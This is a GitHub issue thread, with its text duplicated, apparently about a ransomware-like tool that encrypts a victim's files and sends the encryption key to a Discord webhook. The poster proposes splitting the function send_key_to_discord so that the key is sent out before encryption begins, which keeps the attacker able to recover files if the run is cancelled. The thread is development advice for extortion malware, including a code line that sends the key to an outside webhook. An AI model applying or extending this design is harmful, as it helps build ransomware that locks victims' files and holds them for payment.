You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Thats bad, bcs it makes that if the Encryption is cancelled, theres no way to recover your files.
Thats bad, i will fix that when i have my windows laptop back...
How:
# Send the key, encryption stats, and identifier code to the Discord webhook
send_key_to_discord(webhook_url, key, file_count, folder_count, identifier_code)
dupe this function, rename it and change it so it only sends the key, then move it infront of the Encryption in the main function.
So basically there should be two funcions, one that send folder, file count and identifier code,
and one that sends the Encryption Key to discord
The text was updated successfully, but these errors were encountered:
Thats bad, bcs it makes that if the Encryption is cancelled, theres no way to recover your files.
Thats bad, i will fix that when i have my windows laptop back...
How:
dupe this function, rename it and change it so it only sends the key, then move it infront of the Encryption in the main function.
So basically there should be two funcions, one that send folder, file count and identifier code,
and one that sends the Encryption Key to discord
The text was updated successfully, but these errors were encountered: